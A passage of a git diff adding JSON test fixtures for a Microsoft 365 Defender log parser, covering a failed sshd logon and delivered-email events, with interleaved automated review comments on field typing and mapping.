"Role": "Actor", + "Type": "User" + } + ], + "type": "Basic" + }, + "report": { + "id": "98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef" + } + } + }, + "user": { + "full_name": "John DOE" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json b/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json new file mode 100644 index 000000000..1d69ebb63 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json 
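Review bot: The expected `action.properties` pins `"IsAdminOperation": "false"` as a string while `IsExternalUser` and `IsImpersonated` in the same object are booleans, and `"ApplicationId": "28375"` as a string while the input carries an integer; a rule written as `action.properties.IsAdminOperation == false` will never match this event, so either the parser should cast these consistently or the fixture should not enshrine the mixed typing. The expected output also carries no `user.id`, `user.email` or `related.user`, although `AccountObjectId` and `RawEventData.UserId` (`john.doe@company.fr`) are present in the input — if that is unintended, the identity mapping in the parser (outside this diff) is worth extending and pinning here. Minor: the file is committed without a trailing newline.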
@@ -0,0 +1,98 @@ +{ + "input": { + "message": "{\"time\": \"2024-11-18T10:08:29.9147832Z\", \"tenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceLogonEvents\", \"_TimeReceivedBySvc\": \"2024-11-18T10:07:35.3397350Z\", \"properties\": {\"AccountName\": \"account\", \"AccountDomain\": \"domain\", \"LogonType\": \"Network\", \"DeviceName\": \"domain\", \"DeviceId\": \"1111111111111111111111111111111111111111\", \"ReportId\": 413706, \"AccountSid\": null, \"AppGuardContainerId\": null, \"LogonId\": null, \"RemoteIP\": \"1.2.3.4\", \"RemotePort\": null, \"RemoteDeviceName\": null, \"ActionType\": \"LogonFailed\", \"InitiatingProcessId\": 3653343, \"InitiatingProcessCreationTime\": \"2024-11-18T10:07:20.29393Z\", \"InitiatingProcessFileName\": \"sshd\", \"InitiatingProcessFolderPath\": \"/usr/sbin/sshd\", \"InitiatingProcessSHA1\": \"f1d50e0d3e0ba197baf152614e0cd94487a1142e\", \"InitiatingProcessSHA256\": \"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\", \"InitiatingProcessMD5\": \"51a9cac9c4e8da44ffd7502be17604ee\", \"InitiatingProcessCommandLine\": \"/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 
-oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"domain\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"InitiatingProcessParentId\": 3653343, \"InitiatingProcessParentCreationTime\": \"2024-11-18T10:07:20.29Z\", \"InitiatingProcessParentFileName\": \"sshd\", \"AdditionalFields\": \"{\\\"PosixUserId\\\":1301,\\\"PosixPrimaryGroupName\\\":\\\"account\\\",\\\"PosixPrimaryGroupId\\\":500,\\\"PosixSecondaryGroups\\\":\\\"[{\\\\\\\"Name\\\\\\\":\\\\\\\"users\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":100},{\\\\\\\"Name\\\\\\\":\\\\\\\"exploitation\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":1202}]\\\",\\\"InitiatingAccountName\\\":\\\"root\\\",\\\"InitiatingAccountDomain\\\":\\\"domain\\\",\\\"InitiatingAccountPosixUserId\\\":0,\\\"InitiatingAccountPosixGroupName\\\":\\\"mdatp\\\",\\\"InitiatingAccountPosixGroupId\\\":595}\", \"RemoteIPType\": \"Private\", \"IsLocalAdmin\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"Protocol\": null, 
\"FailureReason\": null, \"InitiatingProcessFileSize\": 890528, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-11-18T10:07:22.681617Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\": \"2024-11-18T10:08:29.9147832Z\", \"tenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceLogonEvents\", \"_TimeReceivedBySvc\": \"2024-11-18T10:07:35.3397350Z\", \"properties\": {\"AccountName\": \"account\", \"AccountDomain\": \"domain\", \"LogonType\": \"Network\", \"DeviceName\": \"domain\", \"DeviceId\": \"1111111111111111111111111111111111111111\", \"ReportId\": 413706, \"AccountSid\": null, \"AppGuardContainerId\": null, \"LogonId\": null, \"RemoteIP\": \"1.2.3.4\", \"RemotePort\": null, \"RemoteDeviceName\": null, \"ActionType\": \"LogonFailed\", \"InitiatingProcessId\": 3653343, \"InitiatingProcessCreationTime\": \"2024-11-18T10:07:20.29393Z\", \"InitiatingProcessFileName\": \"sshd\", \"InitiatingProcessFolderPath\": \"/usr/sbin/sshd\", \"InitiatingProcessSHA1\": \"f1d50e0d3e0ba197baf152614e0cd94487a1142e\", \"InitiatingProcessSHA256\": \"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\", \"InitiatingProcessMD5\": \"51a9cac9c4e8da44ffd7502be17604ee\", \"InitiatingProcessCommandLine\": 
\"/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"domain\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"InitiatingProcessParentId\": 3653343, \"InitiatingProcessParentCreationTime\": \"2024-11-18T10:07:20.29Z\", 
\"InitiatingProcessParentFileName\": \"sshd\", \"AdditionalFields\": \"{\\\"PosixUserId\\\":1301,\\\"PosixPrimaryGroupName\\\":\\\"account\\\",\\\"PosixPrimaryGroupId\\\":500,\\\"PosixSecondaryGroups\\\":\\\"[{\\\\\\\"Name\\\\\\\":\\\\\\\"users\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":100},{\\\\\\\"Name\\\\\\\":\\\\\\\"exploitation\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":1202}]\\\",\\\"InitiatingAccountName\\\":\\\"root\\\",\\\"InitiatingAccountDomain\\\":\\\"domain\\\",\\\"InitiatingAccountPosixUserId\\\":0,\\\"InitiatingAccountPosixGroupName\\\":\\\"mdatp\\\",\\\"InitiatingAccountPosixGroupId\\\":595}\", \"RemoteIPType\": \"Private\", \"IsLocalAdmin\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"Protocol\": null, \"FailureReason\": null, \"InitiatingProcessFileSize\": 890528, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-11-18T10:07:22.681617Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "event": { + "category": [ + "authentication" + ], + "dataset": "device_logon_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-18T10:07:22.681617Z", + "action": { + "properties": { + "InitiatingProcessCommandLine": "/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc 
-oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R", + "InitiatingProcessFileSize": 890528, + "LogonType": "Network", + "RemoteIPType": "Private" + }, + "type": "LogonFailed" + }, + "destination": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "host": { + "id": "1111111111111111111111111111111111111111", + "name": "domain" + }, + "microsoft": { + "defender": { + "report": { + "id": "413706" + } + } + }, + "process": { + "args": [ + "-D", + "-R", + 
"-oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa", + "-oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc", + "-oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1-", + "-oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com", + "-oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1", + "-oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512", + "-oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com" + ], + "command_line": "/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc 
-oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R", + "executable": "/usr/sbin/sshd", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "sshd", + "parent": { + "name": "sshd", + "pid": 3653343, + "start": "2024-11-18T10:07:20.290000Z" + }, + "pid": 3653343, + "start": "2024-11-18T10:07:20.293930Z", + "user": { + "domain": "domain", + "name": "root" + }, + 
"working_directory": "/usr/sbin" + }, + "related": { + "hash": [ + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", + "f1d50e0d3e0ba197baf152614e0cd94487a1142e" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "account" + ] + }, + "user": { + "domain": "domain", + "name": "account" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_email_delivered.json b/Microsoft/microsoft-365-defender/tests/test_email_delivered.json new file mode 100644 index 000000000..11ca88986 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_email_delivered.json 
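Review bot: For an input `ActionType` of `LogonFailed` the expected event carries `"type": ["info"]` and no `event.outcome`, so brute-force and failed-authentication rules keyed on `event.outcome == "failure"` will not see this event; the parser (outside this diff) should set `"outcome": "failure"` for `LogonFailed` (and `"success"` for successful logons) and this fixture should pin it. The remote peer `1.2.3.4` is also mapped to `destination.ip`, whereas for an inbound network logon handled by `/usr/sbin/sshd` on the reporting host the remote IP is the party attempting the logon and would normally be `source.ip` — the Defender schema wording for `RemoteIP` is ambiguous, so confirm against real telemetry before changing the mapping. Minor: the file is committed without a trailing newline.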
@@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"time\":\"2024-10-28T14:31:34.1371671Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:40.3469550Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<1@eu-west-1.test.com>\",\"Timestamp\":\"2024-10-28T14:18:40Z\",\"EmailClusterId\":3162398878,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@company.com\",\"SenderFromAddress\":\"john.doe@company.com\",\"SenderMailFromDomain\":\"company.com\",\"SenderFromDomain\":\"company.com\",\"RecipientEmailAddress\":\"alan.smithee@company.com\",\"Subject\":\"MAIL subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": 
"{\"time\":\"2024-10-28T14:31:34.1371671Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:40.3469550Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<1@eu-west-1.test.com>\",\"Timestamp\":\"2024-10-28T14:18:40Z\",\"EmailClusterId\":3162398878,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@company.com\",\"SenderFromAddress\":\"john.doe@company.com\",\"SenderMailFromDomain\":\"company.com\",\"SenderFromDomain\":\"company.com\",\"RecipientEmailAddress\":\"alan.smithee@company.com\",\"Subject\":\"MAIL subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "action": "Delivered", + "category": [ + "connection", + "email" + ], + "dataset": "email_events", + "type": [ + "allowed", + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:40Z", + "action": { + "properties": { + "AttachmentCount": 0, + "AuthenticationDetails": "{\"DKIM\": \"none\", \"DMARC\": \"pass\", \"SPF\": \"pass\"}", + "Connectors": "Relai SMTP interne", + 
"DeliveryAction": "Delivered", + "DeliveryLocation": "Inbox/folder", + "EmailClusterId": "3162398878", + "EmailDirection": "Inbound", + "EmailLanguage": "en", + "OrgLevelAction": "Allow", + "OrgLevelPolicy": "Connection policy", + "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef", + "SenderFromDomain": "company.com", + "UrlCount": 0 + } + }, + "email": { + "direction": "inbound", + "from": { + "address": [ + "john.doe@company.com" + ] + }, + "local_id": "12345678-1234-abcd-ef90-abcdef123456", + "message_id": "<1@eu-west-1.test.com>", + "subject": "MAIL subject", + "to": { + "address": [ + "alan.smithee@company.com" + ] + } + }, + "microsoft": { + "defender": { + "report": { + "id": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c" + } + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json b/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json new file mode 100644 index 000000000..d3b7b8c2f --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json 
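Review bot: In this fixture `SenderMailFromAddress` and `SenderFromAddress` are identical (`john.doe@company.com`), so the expectation `"address": ["john.doe@company.com"]` under `email.from` cannot tell whether the parser maps the RFC 5322 `From` header or the envelope `MAIL FROM`; the envelope/header mismatch is the signal most spoofing and DMARC-alignment detections rely on, so a sample where the two differ is needed to pin which one lands in `email.from.address` and whether the other is retained at all. Relatedly, the SPF/DKIM/DMARC verdicts survive only as an opaque JSON string in `action.properties.AuthenticationDetails`, which cannot be filtered on without re-parsing; extracting them into dedicated fields (outside this diff) would make a `DMARC` failure searchable. Minor: the file is committed without a trailing newline.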
@@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"time\":\"2024-10-28T14:39:28.9769628Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:38.5006358Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<20241028141819.43623347A8F@test.fr>\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"EmailClusterId\":2633942188,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@test.fr\",\"SenderFromAddress\":\"john.doe@test.fr\",\"SenderMailFromDomain\":\"test.fr\",\"SenderFromDomain\":\"test.fr\",\"RecipientEmailAddress\":\"alan.smithee@test.fr\",\"Subject\":\"EMAIL Subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": 
